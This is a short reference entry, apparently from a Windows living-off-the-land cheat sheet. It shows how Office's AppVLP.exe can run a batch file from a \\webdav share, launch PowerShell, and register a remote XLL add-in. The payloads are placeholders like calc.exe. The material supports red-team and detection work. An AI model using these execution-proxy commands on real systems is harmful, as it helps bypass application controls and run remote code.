03 : /Privilege-escalation Windows#

~/# cat Appvlp.exe.md

Application Virtualization Utility Included with Microsoft Office 2016


C:\Program Files\Microsoft Office\root\client\appvlp.exe
C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe


Executes calc.bat through AppVLP.exe

AppVLP.exe \\webdav\calc.bat

Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.

AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)"

Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.

AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"